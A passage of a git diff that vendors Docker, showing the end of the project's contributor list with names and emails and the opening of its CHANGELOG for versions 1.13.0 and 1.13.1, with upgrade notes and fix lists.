Wright +Brandon Liu +Brandon Philips +Brandon Rhodes +Brendan Dixon +Brent Salisbury +Brett Higgins +Brett Kochendorfer +Brian (bex) Exelbierd +Brian Bland +Brian DeHamer +Brian Dorsey +Brian Flad +Brian Goff +Brian McCallister +Brian Olsen +Brian Shumate +Brian Torres-Gil +Brian Trump +Brice Jaglin +Briehan Lombaard +Bruno Bigras +Bruno Binet +Bruno Gazzera +Bruno Renié +Bryan Bess +Bryan Boreham +Bryan Matsuo +Bryan Murphy +buddhamagnet +Burke Libbey +Byung Kang +Caleb Spare +Calen Pennington +Cameron Boehmer +Cameron Spear +Campbell Allen +Candid Dauth +Cao Weiwei +Carl Henrik Lunde +Carl Loa Odin +Carl X. 
Su +Carlos Alexandro Becker +Carlos Sanchez +Carol Fager-Higgins +Cary +Casey Bisson +Cedric Davies +Cezar Sa Espinola +Chad Swenson +Chance Zibolski +Chander G +Charles Chan +Charles Hooper +Charles Law +Charles Lindsay +Charles Merriam +Charles Sarrazin +Charles Smith +Charlie Lewis +Chase Bolt +ChaYoung You +Chen Chao +Chen Hanxiao +cheney90 +Chewey +Chia-liang Kao +chli +Cholerae Hu +Chris Alfonso +Chris Armstrong +Chris Dituri +Chris Fordham +Chris Khoo +Chris McKinnel +Chris Seto +Chris Snow +Chris St. Pierre +Chris Stivers +Chris Swan +Chris Wahl +Chris Weyl +chrismckinnel +Christian Berendt +Christian Böhme +Christian Persson +Christian Rotzoll +Christian Simon +Christian Stefanescu +ChristoperBiscardi +Christophe Mehay +Christophe Troestler +Christopher Currie +Christopher Jones +Christopher Latham +Christopher Rigor +Christy Perez +Chun Chen +Ciro S. Costa +Clayton Coleman +Clinton Kitson +Coenraad Loubser +Colin Dunklau +Colin Rice +Colin Walters +Collin Guarino +Colm Hally +companycy +Cory Forsyth +cressie176 +CrimsonGlory +Cristian Staretu +cristiano balducci +Cruceru Calin-Cristian +Cyril F +Daan van Berkel +Daehyeok Mun +Dafydd Crosby +dalanlan +Damian Smyth +Damien Nadé +Damien Nozay +Damjan Georgievski +Dan Anolik +Dan Buch +Dan Cotora +Dan Feldman +Dan Griffin +Dan Hirsch +Dan Keder +Dan Levy +Dan McPherson +Dan Stine +Dan Walsh +Dan Williams +Daniel Antlinger +Daniel Exner +Daniel Farrell +Daniel Garcia +Daniel Gasienica +Daniel Hiltgen +Daniel Menet +Daniel Mizyrycki +Daniel Nephin +Daniel Norberg +Daniel Nordberg +Daniel Robinson +Daniel S +Daniel Von Fange +Daniel X Moore +Daniel YC Lin +Daniel Zhang +Daniel, Dao Quang Minh +Danny Berger +Danny Yates +Darren Coxall +Darren Shepherd +Darren Stahl +Davanum Srinivas +Dave Barboza +Dave Henderson +Dave MacDonald +Dave Tucker +David Anderson +David Calavera +David Corking +David Cramer +David Currie +David Davis +David Dooling +David Gageot +David Gebler +David Lawrence +David Lechner +David M. 
Karr +David Mackey +David Mat +David Mcanulty +David Pelaez +David R. Jenni +David Röthlisberger +David Sheets +David Sissitka +David Trott +David Xia +David Young +Davide Ceretti +Dawn Chen +dbdd +dcylabs +decadent +deed02392 +Deng Guangxing +Deni Bertovic +Denis Gladkikh +Denis Ollier +Dennis Docter +Derek +Derek +Derek Ch +Derek McGowan +Deric Crago +Deshi Xiao +devmeyster +Devvyn Murphy +Dharmit Shah +Dieter Reuter +Dillon Dixon +Dima Stopel +Dimitri John Ledkov +Dimitris Rozakis +Dimitry Andric +Dinesh Subhraveti +Diogo Monica +DiuDiugirl +Djibril Koné +dkumor +Dmitri Logvinenko +Dmitri Shuralyov +Dmitry Demeshchuk +Dmitry Gusev +Dmitry Smirnov +Dmitry V. Krivenok +Dmitry Vorobev +Dolph Mathews +Dominik Finkbeiner +Dominik Honnef +Don Kirkby +Don Kjer +Don Spaulding +Donald Huang +Dong Chen +Donovan Jones +Doron Podoleanu +Doug Davis +Doug MacEachern +Doug Tangren +Dr Nic Williams +dragon788 +Dražen Lučanin +Drew Erny +Dustin Sallings +Ed Costello +Edmund Wagner +Eiichi Tsukata +Eike Herzbach +Eivin Giske Skaaren +Eivind Uggedal +Elan Ruusamäe +Elias Probst +Elijah Zupancic +eluck +Elvir Kuric +Emil Hernvall +Emily Maier +Emily Rose +Emir Ozer +Enguerran +Eohyung Lee +Eric Barch +Eric Hanchrow +Eric Lee +Eric Myhre +Eric Paris +Eric Rafaloff +Eric Rosenberg +Eric Sage +Eric Windisch +Eric Yang +Eric-Olivier Lamey +Erik Bray +Erik Dubbelboer +Erik Hollensbe +Erik Inge Bolsø +Erik Kristensen +Erik Weathers +Erno Hopearuoho +Erwin van der Koogh +Euan +Eugene Yakubovich +eugenkrizo +evalle +Evan Allrich +Evan Carmi +Evan Hazlett +Evan Krall +Evan Phoenix +Evan Wies +Everett Toews +Evgeny Vereshchagin +Ewa Czechowska +Eystein Måløy Stenberg +ezbercih +Fabiano Rosas +Fabio Falci +Fabio Rapposelli +Fabio Rehm +Fabrizio Regini +Fabrizio Soppelsa +Faiz Khan +falmp +Fangyuan Gao <21551127@zju.edu.cn> +Fareed Dudhia +Fathi Boudra +Federico Gimenez +Felix Geisendörfer +Felix Hupfeld +Felix Rabe +Felix Ruess +Felix Schindler +Ferenc Szabo +Fernando +Fero Volar +Ferran 
Rodenas +Filipe Brandenburger +Filipe Oliveira +fl0yd +Flavio Castelli +FLGMwt +Florian +Florian Klein +Florian Maier +Florian Weingarten +Florin Asavoaie +fonglh +fortinux +Francesc Campoy +Francis Chuang +Francisco Carriedo +Francisco Souza +Frank Groeneveld +Frank Herrmann +Frank Macreery +Frank Rosquin +Fred Lifton +Frederick F. Kautz IV +Frederik Loeffert +Frederik Nordahl Jul Sabroe +Freek Kalter +frosforever +fy2462 +Félix Baylac-Jacqué +Félix Cantournet +Gabe Rosenhouse +Gabor Nagy +Gabriel Monroy +GabrielNicolasAvellaneda +Galen Sampson +Gareth Rushgrove +Garrett Barboza +Gaurav +gautam, prasanna +GennadySpb +Geoffrey Bachelet +George MacRorie +George Xie +Georgi Hristozov +Gereon Frey +German DZ +Gert van Valkenhoef +Gianluca Borello +Gildas Cuisinier +gissehel +Giuseppe Mazzotta +Gleb Fotengauer-Malinovskiy +Gleb M Borisov +Glyn Normington +GoBella +Goffert van Gool +Gosuke Miyashita +Gou Rao +Govinda Fichtner +Grant Reaber +Graydon Hoare +Greg Fausak +Greg Thornton +grossws +grunny +gs11 +Guilhem Lettron +Guilherme Salgado +Guillaume Dufour +Guillaume J. Charmes +guoxiuyan +Gurjeet Singh +Guruprasad +gwx296173 +Günter Zöchbauer +Hans Kristian Flaatten +Hans Rødtang +Hao Shu Wei +Hao Zhang <21521210@zju.edu.cn> +Harald Albers +Harley Laue +Harold Cooper +Harry Zhang +He Simei +heartlock <21521209@zju.edu.cn> +Hector Castro +Henning Sprang +Hobofan +Hollie Teal +Hong Xu +hsinko <21551195@zju.edu.cn> +Hu Keping +Hu Tao +Huanzhong Zhang +Huayi Zhang +Hugo Duncan +Hugo Marisco <0x6875676f@gmail.com> +Hunter Blanks +huqun +Huu Nguyen +hyeongkyu.lee +hyp3rdino +Hyzhou <1187766782@qq.com> +Ian Babrou +Ian Bishop +Ian Bull +Ian Calvert +Ian Lee +Ian Main +Ian Truslove +Iavael +Icaro Seara +Igor Dolzhikov +Ilkka Laukkanen +Ilya Dmitrichenko +Ilya Gusev +ILYA Khlopotov +imre Fitos +inglesp +Ingo Gottwald +Isaac Dupree +Isabel Jimenez +Isao Jonas +Ivan Babrou +Ivan Fraixedes +Ivan Grcic +J Bruni +J. 
Nunn +Jack Danger Canty +Jacob Atzen +Jacob Edelman +Jake Champlin +Jake Moshenko +jakedt +James Allen +James Carey +James Carr +James DeFelice +James Harrison Fisher +James Kyburz +James Kyle +James Lal +James Mills +James Nugent +James Turnbull +Jamie Hannaford +Jamshid Afshar +Jan Keromnes +Jan Koprowski +Jan Pazdziora +Jan Toebes +Jan-Gerd Tenberge +Jan-Jaap Driessen +Jana Radhakrishnan +Jannick Fahlbusch +Januar Wayong +Jared Biel +Jared Hocutt +Jaroslaw Zabiello +jaseg +Jasmine Hegman +Jason Divock +Jason Giedymin +Jason Green +Jason Hall +Jason Heiss +Jason Livesay +Jason McVetta +Jason Plum +Jason Shepherd +Jason Smith +Jason Sommer +Jason Stangroome +jaxgeller +Jay +Jay +Jay Kamat +Jean-Baptiste Barth +Jean-Baptiste Dalido +Jean-Paul Calderone +Jean-Tiare Le Bigot +Jeff Anderson +Jeff Johnston +Jeff Lindsay +Jeff Mickey +Jeff Minard +Jeff Nickoloff +Jeff Silberman +Jeff Welch +Jeffrey Bolle +Jeffrey Morgan +Jeffrey van Gogh +Jenny Gebske +Jeremy Grosser +Jeremy Price +Jeremy Qian +Jeremy Unruh +Jeroen Jacobs +Jesse Dearing +Jesse Dubay +Jessica Frazelle +Jezeniel Zapanta +jgeiger +Jhon Honce +Ji.Zhilong +Jian Zhang +jianbosun +Jilles Oldenbeuving +Jim Alateras +Jim Perrin +Jimmy Cuadra +Jimmy Puckett +jimmyxian +Jinsoo Park +Jiri Popelka +Jiří Župka +jjy +jmzwcn +Joao Fernandes +Joe Beda +Joe Doliner +Joe Ferguson +Joe Gordon +Joe Shaw +Joe Van Dyk +Joel Friedly +Joel Handwell +Joel Hansson +Joel Wurtz +Joey Geiger +Joey Gibson +Joffrey F +Johan Euphrosine +Johan Rydberg +Johanan Lieberman +Johannes 'fish' Ziemke +John Costa +John Feminella +John Gardiner Myers +John Gossman +John Howard (VM) +John OBrien III +John Starks +John Tims +John Warwick +John Willis +johnharris85 +Jon Wedaman +Jonas Pfenniger +Jonathan A. 
Sternberg +Jonathan Boulle +Jonathan Camp +Jonathan Dowland +Jonathan Lebon +Jonathan Lomas +Jonathan McCrohan +Jonathan Mueller +Jonathan Pares +Jonathan Rudenberg +Jonathan Stoppani +Joost Cassee +Jordan +Jordan Arentsen +Jordan Sissel +Jose Diaz-Gonzalez +Joseph Anthony Pasquale Holsten +Joseph Hager +Joseph Kern +Josh +Josh Bodah +Josh Chorlton +Josh Hawn +Josh Horwitz +Josh Poimboeuf +Josiah Kiehl +José Tomás Albornoz +JP +jrabbit +Julian Taylor +Julien Barbier +Julien Bisconti +Julien Bordellier +Julien Dubois +Julien Pervillé +Julio Montes +Jun-Ru Chang +Jussi Nummelin +Justas Brazauskas +Justin Cormack +Justin Force +Justin Plock +Justin Simonelis +Justin Terry +Justyn Temme +Jyrki Puttonen +Jérôme Petazzoni +Jörg Thalheim +Kai Blin +Kai Qiang Wu(Kennan) +Kamil Domański +kamjar gerami +Kanstantsin Shautsou +Kara Alexandra +Karan Lyons +Kareem Khazem +kargakis +Karl Grzeszczak +Karol Duleba +Katie McLaughlin +Kato Kazuyoshi +Katrina Owen +Kawsar Saiyeed +kayrus +Ke Xu +Keith Hudgins +Keli Hu +Ken Cochrane +Ken Herner +Ken ICHIKAWA +Kenfe-Mickaël Laventure +Kenjiro Nakayama +Kent Johnson +Kevin "qwazerty" Houdebert +Kevin Burke +Kevin Clark +Kevin J. Lynagh +Kevin Jing Qiu +Kevin Menard +Kevin P. Kucharczyk +Kevin Richardson +Kevin Shi +Kevin Wallace +Kevin Yap +kevinmeredith +Keyvan Fatehi +kies +Kim BKC Carlbacker +Kim Eik +Kimbro Staken +Kir Kolyshkin +Kiran Gangadharan +Kirill Kolyshkin +Kirill SIbirev +knappe +Kohei Tsuruta +Koichi Shiraishi +Konrad Kleine +Konstantin L +Konstantin Pelykh +Krasimir Georgiev +Kris-Mikael Krister +Kristian Haugene +Kristina Zabunova +krrg +Kun Zhang +Kunal Kushwaha +Kyle Conroy +Kyle Linden +kyu +Lachlan Coote +Lai Jiangshan +Lajos Papp +Lakshan Perera +Lalatendu Mohanty +lalyos +Lance Chen +Lance Kinley +Lars Butler +Lars Kellogg-Stedman +Lars R. 
Damerow +Laszlo Meszaros +Laurent Erignoux +Laurie Voss +Leandro Siqueira +Lee Chao <932819864@qq.com> +Lee, Meng-Han +leeplay +Lei Jitang +Len Weincier +Lennie +Leszek Kowalski +Levi Blackstone +Levi Gross +Lewis Marshall +Lewis Peckover +Liam Macgillavry +Liana Lo +Liang Mingqiang +Liang-Chi Hsieh +liaoqingwei +limsy +Lin Lu +LingFaKe +Linus Heckemann +Liran Tal +Liron Levin +Liu Bo +Liu Hua +lixiaobing10051267 +LIZAO LI +Lloyd Dewolf +Lokesh Mandvekar +longliqiang88 <394564827@qq.com> +Lorenz Leutgeb +Lorenzo Fontana +Louis Opter +Luca Marturana +Luca Orlandi +Luca-Bogdan Grigorescu +Lucas Chan +Lucas Chi +Luciano Mores +Luis Martínez de Bartolomé Izquierdo +Lukas Waslowski +lukaspustina +Lukasz Zajaczkowski +lukemarsden +Lynda O'Leary +Lénaïc Huard +Ma Shimiao +Mabin +Madhav Puri +Madhu Venugopal +Mageee <21521230.zju.edu.cn> +Mahesh Tiyyagura +malnick +Malte Janduda +manchoz +Manfred Touron +Manfred Zabarauskas +Mansi Nahar +mansinahar +Manuel Meurer +Manuel Woelker +mapk0y +Marc Abramowitz +Marc Kuo +Marc Tamsky +Marcelo Salazar +Marco Hennings +Marcus Farkas +Marcus Linke +Marcus Ramberg +Marek Goldmann +Marian Marinov +Marianna Tessel +Mario Loriedo +Marius Gundersen +Marius Sturm +Marius Voila +Mark Allen +Mark McGranaghan +Mark McKinstry +Mark West +Marko Mikulicic +Marko Tibold +Markus Fix +Martijn Dwars +Martijn van Oosterhout +Martin Honermeyer +Martin Kelly +Martin Mosegaard Amdisen +Martin Redmond +Mary Anthony +Masahito Zembutsu +Mason Malone +Mateusz Sulima +Mathias Monnerville +Mathieu Le Marec - Pasquet +Matt Apperson +Matt Bachmann +Matt Bentley +Matt Haggard +Matt Hoyle +Matt McCormick +Matt Moore +Matt Richardson +Matt Robenolt +Matthew Heon +Matthew Mayer +Matthew Mueller +Matthew Riley +Matthias Klumpp +Matthias Kühnle +Matthias Rampke +Matthieu Hauglustaine +mattymo +mattyw +Mauricio Garavaglia +mauriyouth +Max Shytikov +Maxim Fedchyshyn +Maxim Ivanov +Maxim Kulkin +Maxim Treskin +Maxime Petazzoni +Meaglith Ma +meejah +Megan Kostick +Mehul 
Kar +Mei ChunTao +Mengdi Gao +Mert Yazıcıoğlu +mgniu +Micah Zoltu +Michael A. Smith +Michael Bridgen +Michael Brown +Michael Chiang +Michael Crosby +Michael Currie +Michael Friis +Michael Gorsuch +Michael Grauer +Michael Holzheu +Michael Hudson-Doyle +Michael Huettermann +Michael Käufl +Michael Neale +Michael Prokop +Michael Scharf +Michael Stapelberg +Michael Steinert +Michael Thies +Michael West +Michal Fojtik +Michal Gebauer +Michal Jemala +Michal Minar +Michal Wieczorek +Michaël Pailloncy +Michał Czeraszkiewicz +Michiel@unhosted +Mickaël FORTUNATO +Miguel Angel Fernández +Miguel Morales +Mihai Borobocea +Mihuleacc Sergiu +Mike Brown +Mike Chelen +Mike Danese +Mike Dillon +Mike Dougherty +Mike Gaffney +Mike Goelzer +Mike Leone +Mike MacCana +Mike Naberezny +Mike Snitzer +mikelinjie <294893458@qq.com> +Mikhail Sobolev +Miloslav Trmač +mingqing +Mingzhen Feng +Misty Stanley-Jones +Mitch Capper +mlarcher +Mohammad Banikazemi +Mohammed Aaqib Ansari +Mohit Soni +Morgan Bauer +Morgante Pell +Morgy93 +Morten Siebuhr +Morton Fox +Moysés Borges +mqliang +Mrunal Patel +msabansal +mschurenko +muge +Mustafa Akın +Muthukumar R +Máximo Cuadros +Médi-Rémi Hashim +Nahum Shalman +Nakul Pathak +Nalin Dahyabhai +Nan Monnand Deng +Naoki Orii +Natalie Parker +Natanael Copa +Nate Brennand +Nate Eagleson +Nate Jones +Nathan Hsieh +Nathan Kleyn +Nathan LeClaire +Nathan McCauley +Nathan Williams +Neal McBurnett +Neil Peterson +Nelson Chen +Neyazul Haque +Nghia Tran +Niall O'Higgins +Nicholas E. Rabenau +nick +Nick DeCoursin +Nick Irvine +Nick Parker +Nick Payne +Nick Stenning +Nick Stinemates +Nicola Kabar +Nicolas Borboën +Nicolas De loof +Nicolas Dudebout +Nicolas Goy +Nicolas Kaiser +Nicolás Hock Isaza +Nigel Poulton +NikolaMandic +nikolas +Nirmal Mehta +Nishant Totla +NIWA Hideyuki +noducks +Nolan Darilek +nponeccop +Nuutti Kotivuori +nzwsch +O.S. 
Tezer +objectified +OddBloke +odk- +Oguz Bilgic +Oh Jinkyun +Ohad Schneider +ohmystack +Ole Reifschneider +Oliver Neal +Olivier Gambier +Olle Jonsson +Oriol Francès +orkaa +Oskar Niburski +Otto Kekäläinen +oyld +ozlerhakan +paetling +pandrew +panticz +Paolo G. Giarrusso +Pascal Borreli +Pascal Hartig +Patrick Böänziger +Patrick Devine +Patrick Hemmer +Patrick Stapleton +pattichen +Paul +paul +Paul Annesley +Paul Bellamy +Paul Bowsher +Paul Furtado +Paul Hammond +Paul Jimenez +Paul Lietar +Paul Liljenberg +Paul Morie +Paul Nasrat +Paul Weaver +Paulo Ribeiro +Pavel Lobashov +Pavel Pospisil +Pavel Sutyrin +Pavel Tikhomirov +Pavlos Ratis +Pavol Vargovcik +Peeyush Gupta +Peggy Li +Pei Su +Penghan Wang +perhapszzy@sina.com +pestophagous +Peter Bourgon +Peter Braden +Peter Choi +Peter Dave Hello +Peter Edge +Peter Ericson +Peter Esbensen +Peter Malmgren +Peter Salvatore +Peter Volpe +Peter Waller +Petr Švihlík +Phil +Phil Estes +Phil Spitler +Philip Monroe +Philipp Wahala +Philipp Weissensteiner +Phillip Alexander +pidster +Piergiuliano Bossi +Pierre +Pierre Carrier +Pierre Dal-Pra +Pierre Wacrenier +Pierre-Alain RIVIERE +Piotr Bogdan +pixelistik +Porjo +Poul Kjeldager Sørensen +Pradeep Chhetri +Prasanna Gautam +Prayag Verma +Przemek Hejman +pysqz +qg <1373319223@qq.com> +qhuang +Qiang Huang +qq690388648 <690388648@qq.com> +Quentin Brossard +Quentin Perez +Quentin Tayssier +r0n22 +Rafal Jeczalik +Rafe Colton +Raghavendra K T +Raghuram Devarakonda +Rajat Pandit +Rajdeep Dua +Ralf Sippl +Ralle +Ralph Bean +Ramkumar Ramachandra +Ramon Brooker +Ramon van Alteren +Ray Tsang +ReadmeCritic +Recursive Madman +Regan McCooey +Remi Rampin +Renato Riccieri Santos Zannon +resouer +rgstephens +Rhys Hiltner +Rich Moyse +Rich Seymour +Richard +Richard Burnison +Richard Harvey +Richard Mathie +Richard Metzler +Richard Scothern +Richo Healey +Rick Bradley +Rick van de Loo +Rick Wieman +Rik Nijessen +Riku Voipio +Riley Guerin +Ritesh H Shukla +Riyaz Faizullabhoy +Rob Vesse +Robert Bachmann 
+Robert Bittle +Robert Obryk +Robert Stern +Robert Terhaar +Robert Wallis +Roberto G. Hashioka +Robin Naundorf +Robin Schneider +Robin Speekenbrink +robpc +Rodolfo Carvalho +Rodrigo Vaz +Roel Van Nyen +Roger Peppe +Rohit Jnagal +Rohit Kadam +Roland Huß +Roland Kammerer +Roland Moriz +Roma Sokolov +Roman Strashkin +Ron Smits +Ron Williams +root +root +root +root +root +Rory Hunter +Rory McCune +Ross Boucher +Rovanion Luckey +Rozhnov Alexandr +rsmoorthy +Rudolph Gottesheim +Rui Lopes +Runshen Zhu +Ryan Anderson +Ryan Aslett +Ryan Belgrave +Ryan Detzel +Ryan Fowler +Ryan McLaughlin +Ryan O'Donnell +Ryan Seto +Ryan Thomas +Ryan Trauntvein +Ryan Wallner +RyanDeng +Rémy Greinhofer +s. rannou +s00318865 +Sabin Basyal +Sachin Joshi +Sagar Hani +Sainath Grandhi +sakeven +Sally O'Malley +Sam Abed +Sam Alba +Sam Bailey +Sam J Sharpe +Sam Neirinck +Sam Reis +Sam Rijs +Sambuddha Basu +Sami Wagiaalla +Samuel Andaya +Samuel Dion-Girardeau +Samuel Karp +Samuel PHAN +Sankar சங்கர் +Sanket Saurav +Santhosh Manohar +sapphiredev +Satnam Singh +satoru +Satoshi Amemiya +Satoshi Tagomori +scaleoutsean +Scott Bessler +Scott Collier +Scott Johnston +Scott Stamp +Scott Walls +sdreyesg +Sean Christopherson +Sean Cronin +Sean OMeara +Sean P. 
Kane +Sebastiaan van Steenis +Sebastiaan van Stijn +Senthil Kumar Selvaraj +Senthil Kumaran +SeongJae Park +Seongyeol Lim +Serge Hallyn +Sergey Alekseev +Sergey Evstifeev +Serhat Gülçiçek +Sevki Hasirci +Shane Canon +Shane da Silva +shaunol +Shawn Landden +Shawn Siefkas +shawnhe +Shekhar Gulati +Sheng Yang +Shengbo Song +Shev Yan +Shih-Yuan Lee +Shijiang Wei +Shishir Mahajan +Shoubhik Bose +Shourya Sarcar +shuai-z +Shukui Yang +Shuwei Hao +Sian Lerk Lau +sidharthamani +Silas Sewell +Simei He +Simon Eskildsen +Simon Leinen +Simon Taranto +Sindhu S +Sjoerd Langkemper +skaasten +Solganik Alexander +Solomon Hykes +Song Gao +Soshi Katsuta +Soulou +Spencer Brown +Spencer Smith +Sridatta Thatipamala +Sridhar Ratnakumar +Srini Brahmaroutu +srinsriv +Steeve Morin +Stefan Berger +Stefan J. Wernli +Stefan Praszalowicz +Stefan Scherer +Stefan Staudenmeyer +Stefan Weil +Stephen Crosby +Stephen Day +Stephen Drake +Stephen Rust +Steve Durrheimer +Steve Francia +Steve Koch +Steven Burgess +Steven Erenst +Steven Iveson +Steven Merrill +Steven Richards +Steven Taylor +Subhajit Ghosh +Sujith Haridasan +Suryakumar Sudar +Sven Dowideit +Swapnil Daingade +Sylvain Baubeau +Sylvain Bellemare +Sébastien +Sébastien Luttringer +Sébastien Stormacq +Tadej Janež +TAGOMORI Satoshi +tang0th +Tangi COLIN +Tatsuki Sugiura +Tatsushi Inagaki +Taylor Jones +tbonza +Ted M. 
Young +Tehmasp Chaudhri +Tejesh Mehta +terryding77 <550147740@qq.com> +tgic +Thatcher Peskens +theadactyl +Thell 'Bo' Fowler +Thermionix +Thijs Terlouw +Thomas Bikeev +Thomas Frössman +Thomas Gazagnaire +Thomas Grainger +Thomas Hansen +Thomas Leonard +Thomas LEVEIL +Thomas Orozco +Thomas Riccardi +Thomas Schroeter +Thomas Sjögren +Thomas Swift +Thomas Tanaka +Thomas Texier +Tianon Gravi +Tianyi Wang +Tibor Vass +Tiffany Jernigan +Tiffany Low +Tim Bosse +Tim Dettrick +Tim Düsterhus +Tim Hockin +Tim Ruffles +Tim Smith +Tim Terhorst +Tim Wang +Tim Waugh +Tim Wraight +timfeirg +Timothy Hobbs +tjwebb123 +tobe +Tobias Bieniek +Tobias Bradtke +Tobias Gesellchen +Tobias Klauser +Tobias Munk +Tobias Schmidt +Tobias Schwab +Todd Crane +Todd Lunter +Todd Whiteman +Toli Kuznets +Tom Barlow +Tom Denham +Tom Fotherby +Tom Howe +Tom Hulihan +Tom Maaswinkel +Tom X. Tobin +Tomas Tomecek +Tomasz Kopczynski +Tomasz Lipinski +Tomasz Nurkiewicz +Tommaso Visconti +Tomáš Hrčka +Tonis Tiigi +Tonny Xu +Tony Daws +Tony Miller +toogley +Torstein Husebø +tpng +tracylihui <793912329@qq.com> +Travis Cline +Travis Thieman +Trent Ogren +Trevor +Trevor Pounds +trishnaguha +Tristan Carel +Troy Denton +Tyler Brock +Tzu-Jung Lee +Tõnis Tiigi +Ulysse Carion +unknown +vagrant +Vaidas Jablonskis +Veres Lajos +vgeta +Victor Algaze +Victor Coisne +Victor Costan +Victor I. 
Wood +Victor Lyuboslavsky +Victor Marmol +Victor Palma +Victor Vieux +Victoria Bialas +Vijaya Kumar K +Viktor Stanchev +Viktor Vojnovski +VinayRaghavanKS +Vincent Batts +Vincent Bernat +Vincent Bernat +Vincent Demeester +Vincent Giersch +Vincent Mayers +Vincent Woo +Vinod Kulkarni +Vishal Doshi +Vishnu Kannan +Vitor Monteiro +Vivek Agarwal +Vivek Dasgupta +Vivek Goyal +Vladimir Bulyga +Vladimir Kirillov +Vladimir Pouzanov +Vladimir Rutsky +Vladimir Varankin +VladimirAus +Vojtech Vitek (V-Teq) +waitingkuo +Walter Leibbrandt +Walter Stanish +WANG Chao +Wang Xing +Ward Vandewege +WarheadsSE +Wayne Chang +Wei-Ting Kuo +weiyan +Weiyang Zhu +Wen Cheng Ma +Wendel Fleming +Wenkai Yin +Wenxuan Zhao +Wenyu You <21551128@zju.edu.cn> +Wes Morgan +Will Dietz +Will Rouesnel +Will Weaver +willhf +William Delanoue +William Henry +William Hubbs +William Riancho +William Thurston +WiseTrem +wlan0 +Wolfgang Powisch +wonderflow +Wonjun Kim +xamyzhao +Xianlu Bird +XiaoBing Jiang +Xiaoxu Chen +xiekeyang +Xinzi Zhou +Xiuming Chen +xlgao-zju +xuzhaokui +Yahya +YAMADA Tsuyoshi +Yan Feng +Yang Bai +yangshukui +Yanqiang Miao +Yasunori Mahata +Yestin Sun +Yi EungJun +Yibai Zhang +Yihang Ho +Ying Li +Yohei Ueda +Yong Tang +Yongzhi Pan +yorkie +Youcef YEKHLEF +Yuan Sun +yuchangchun +yuchengxia +yuexiao-wang +YuPengZTE +Yurii Rashkovskii +yuzou +Zac Dover +Zach Borboa +Zachary Jaffee +Zain Memon +Zaiste! 
+Zane DeGraffenried +Zefan Li +Zen Lin(Zhinan Lin) +Zhang Kun +Zhang Wei +Zhang Wentao +Zhenan Ye <21551168@zju.edu.cn> +zhouhao +Zhu Guihua +Zhuoyun Wei +Zilin Du +zimbatm +Ziming Dong +ZJUshuaizhou <21551191@zju.edu.cn> +zmarouf +Zoltan Tombol +zqh +Zuhayr Elahi +Zunayed Ali +Álex González +Álvaro Lázaro +Átila Camurça Alves +尹吉峰 +搏通 diff --git a/vendor/github.com/docker/docker/CHANGELOG.md b/vendor/github.com/docker/docker/CHANGELOG.md new file mode 100644 index 0000000000..36bb880639 --- /dev/null +++ b/vendor/github.com/docker/docker/CHANGELOG.md @@ -0,0 +1,3337 @@ +# Changelog + +Items starting with `DEPRECATE` are important deprecation notices. For more +information on the list of deprecated flags and APIs please have a look at +https://docs.docker.com/engine/deprecated/ where target removal dates can also +be found. + +## 1.13.1 (2017-02-08) + +**IMPORTANT**: On Linux distributions where `devicemapper` was the default storage driver, +the `overlay2`, or `overlay` is now used by default (if the kernel supports it). +To use devicemapper, you can manually configure the storage driver to use through +the `--storage-driver` daemon option, or by setting "storage-driver" in the `daemon.json` +configuration file. + +**IMPORTANT**: In Docker 1.13, the managed plugin api changed, as compared to the experimental +version introduced in Docker 1.12. You must **uninstall** plugins which you installed with Docker 1.12 +_before_ upgrading to Docker 1.13. You can uninstall plugins using the `docker plugin rm` command. + +If you have already upgraded to Docker 1.13 without uninstalling +previously-installed plugins, you may see this message when the Docker daemon +starts: + + Error starting daemon: json: cannot unmarshal string into Go value of type types.PluginEnv + +To manually remove all plugins and resolve this problem, take the following steps: + +1. Remove plugins.json from: `/var/lib/docker/plugins/`. +2. Restart Docker. 
Verify that the Docker daemon starts with no errors. +3. Reinstall your plugins. + +### Contrib + +* Do not require a custom build of tini [#28454](https://github.com/docker/docker/pull/28454) +* Upgrade to Go 1.7.5 [#30489](https://github.com/docker/docker/pull/30489) + +### Remote API (v1.26) & Client + ++ Support secrets in docker stack deploy with compose file [#30144](https://github.com/docker/docker/pull/30144) + +### Runtime + +* Fix size issue in `docker system df` [#30378](https://github.com/docker/docker/pull/30378) +* Fix error on `docker inspect` when Swarm certificates were expired. [#29246](https://github.com/docker/docker/pull/29246) +* Fix deadlock on v1 plugin with activate error [#30408](https://github.com/docker/docker/pull/30408) +* Fix SELinux regression [#30649](https://github.com/docker/docker/pull/30649) + +### Plugins + +* Support global scoped network plugins (v2) in swarm mode [#30332](https://github.com/docker/docker/pull/30332) ++ Add `docker plugin upgrade` [#29414](https://github.com/docker/docker/pull/29414) + +### Windows + +* Fix small regression with old plugins in Windows [#30150](https://github.com/docker/docker/pull/30150) +* Fix warning on Windows [#30730](https://github.com/docker/docker/pull/30730) + +## 1.13.0 (2017-01-18) + +**IMPORTANT**: On Linux distributions where `devicemapper` was the default storage driver, +the `overlay2`, or `overlay` is now used by default (if the kernel supports it). +To use devicemapper, you can manually configure the storage driver to use through +the `--storage-driver` daemon option, or by setting "storage-driver" in the `daemon.json` +configuration file. + +**IMPORTANT**: In Docker 1.13, the managed plugin api changed, as compared to the experimental +version introduced in Docker 1.12. You must **uninstall** plugins which you installed with Docker 1.12 +_before_ upgrading to Docker 1.13. You can uninstall plugins using the `docker plugin rm` command. 
+ +If you have already upgraded to Docker 1.13 without uninstalling +previously-installed plugins, you may see this message when the Docker daemon +starts: + + Error starting daemon: json: cannot unmarshal string into Go value of type types.PluginEnv + +To manually remove all plugins and resolve this problem, take the following steps: + +1. Remove plugins.json from: `/var/lib/docker/plugins/`. +2. Restart Docker. Verify that the Docker daemon starts with no errors. +3. Reinstall your plugins. + +### Builder + ++ Add capability to specify images used as a cache source on build. These images do not need to have local parent chain and can be pulled from other registries [#26839](https://github.com/docker/docker/pull/26839) ++ (experimental) Add option to squash image layers to the FROM image after successful builds [#22641](https://github.com/docker/docker/pull/22641) +* Fix dockerfile parser with empty line after escape [#24725](https://github.com/docker/docker/pull/24725) +- Add step number on `docker build` [#24978](https://github.com/docker/docker/pull/24978) ++ Add support for compressing build context during image build [#25837](https://github.com/docker/docker/pull/25837) ++ add `--network` to `docker build` [#27702](https://github.com/docker/docker/pull/27702) +- Fix inconsistent behavior between `--label` flag on `docker build` and `docker run` [#26027](https://github.com/docker/docker/issues/26027) +- Fix image layer inconsistencies when using the overlay storage driver [#27209](https://github.com/docker/docker/pull/27209) +* Unused build-args are now allowed. 
